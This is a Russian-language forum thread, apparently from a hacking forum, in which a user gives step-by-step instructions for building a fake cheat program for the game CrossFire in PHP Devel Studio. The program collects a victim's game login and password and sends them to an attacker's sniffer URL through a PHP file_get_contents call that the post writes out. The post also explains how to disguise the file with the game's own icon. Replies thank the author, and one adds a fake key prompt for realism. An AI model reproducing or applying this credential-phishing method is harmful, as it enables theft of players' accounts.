PDA

Просмотр полной версии : Фейк в devel studio


[WTF]Bot=)
29.12.2011, 13:05
Всем привет с ФАМИ Я хО
Сегодня я вам покажу как сделать фейк через devel studio к примеру для игры crossfire

1)Нам нужна программа PHP Devel Studio 2.0 вот ссылка [Ссылки могут видеть только зарегистрированные и активированные пользователи] жмет загрузить
2)Скачали... теперь устанавливаем
3)Запускаем программу PHP Devel Studio 2.0
4)Выходить окно нажимаем на крестик
5)Справа у нас компоненты там будет написано Изображение, нажимаем
скрин
6)Выбираем картинку для фейка
7)Чтобы выбрать картинку, у нас справа написано Картинка нажимаем на 3 точки и нажимаем на Загрузить и выбираем картинку и нажимаем на ок
8)У нас в квадратике появилась наша картинка её надо расширить полностью под квадратик
9)Теперь справа видим написано текст, нажимаем на неё
10)И ставим где у нас будет написано допустим Логин игры И пароль игры
11)У нас слева написано текст Пишем допусти Логин игры, снизу написано шрифт нажимаем, выбираем жирный, а размер ну в моём случае 14, нажимаем ок, снизу написано Цвет шрифта, выбираем какой вам хочется, где написано Автор Размер ставим галочку чтобы было видно нам текст
12)Далее опять же нажимаем справа текст и где у вас надпись Логин Игры под ним пишет Пароль Игры, шрифт выбираем жирный, размер тоже 14, а цвет такой выбираем такой же, и опять же ставим галочку на Авто размер
13)Теперь справа видим надпись Поле для ввода нажимаем на неё, это для того чтоб жертва писала туда логин ну и пароль
14)Напротив где у нас написано Логин Игры вот туда и вставляем полю для ввода, и также напротив где написано Пароль Игры
15)Вот вы поставили Полю для Ввода, теперь нажимаем где у нас напротив надписи Логин Игры, нажали теперь справа написано текст надо убрать текст, чтоб было пусто, и также сделать где написано Пароль игры
16)Теперь справа написано Speed Кнопка нажимаем на неё
17)И ставим это справа
18)Поставили.... теперь слева написано Заголовок, ставим допустим надпись Получить КРД на аккаунт
19)Теперь нажимаем на Получить КРД на аккаунт, и справа переходить в вкладочку События, нажимаем добавить события, и выбираем Клик
20)У нас появилась внизу надпись Клик нажимаем на неё 2 раза
21)Вот что нам надо прописать
$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$url = "здесь сылку на сниффер";
file_get_contents($url . "?" . "login:" . $edit1. "|Password:" . $edit2);
22)Вот у нас написано в третьем $url = "url"; надо тут вставить ссылку на снифер, откуда взять ссылку на сниффер? я вам расскажу, заходим на сайт [Ссылки могут видеть только зарегистрированные и активированные пользователи]
23)Заходить где у нас написано Сниффер( в верху)

24)Снизу будет написано регистрация нажимаем на неё

25)Зарегистрировались..... Заходим под себя, зашли... у нас написано Настройки нажимаем

26)Пролистываем вниз у нас будет написано Картинка 1x1px и снизу ссылка копируем и вставляем вот где у нас написано $url = "url";убираем url вставляем вашу ссылку на сниффер далее нажимаем ок
Вот как должно у нас выглядеть
27)У нас фейк готов... теперь нажимаем на Проект
вот скрин [Ссылки могут видеть только зарегистрированные и активированные пользователи]
28)Нажимаем на проект потом собрать программу
29)Хотите чтоб для фейка была иконка crossfire вам нужна нажать, где написано Икона и 3 точки нажимаем, и заходим в папку с игрой crossfire, зашли.... выбираем иконку название иконки вот cf.ico
30)Мы выбрали иконку далее выбираем где у нас будет сохранён фейк, выбираем рабочий стол и название пишем Чит на крд, далее нажимаем на сохранить настройки, а потом собрать, у нас выходит окошечко ну нажмём закрыть
31)У нас на рабочем столе два файла, теперь создаем папку и эти два файла засунем в папку
32)Чтобы убедиться что фейк работает, запускаем наш фейк и пишем допустим вот где логин игры пишем допустим qwerty, а пароль игры ну тоже qwerty теперь нажимаем на Получить КРД на аккаунт
32)Нажали...Теперь посмотрим отчёты, заходим на наш сайт где мы регистрировались далее заходим в лог и смотрим отчёты
33)Ну на этом и всё

Если вам не понятно было в описании, тогда посмотрите на моё видео [Ссылки могут видеть только зарегистрированные и активированные пользователи]

Все удачи

Andry lomakin1
30.12.2011, 01:31
ЭЭ тему удалить.
[Ссылки могут видеть только зарегистрированные и активированные пользователи] <---- ой точно такая только в 100 раз лучше + видос

ildarik
31.01.2012, 19:15
Спасибо помог

slavik14032008
29.04.2013, 15:14
блин че делать у меня ошибка выходит

ВЫКЫВЫы
29.07.2013, 13:28
Ха, а я ещё к нему приделал запрос ключа для большего реализма :)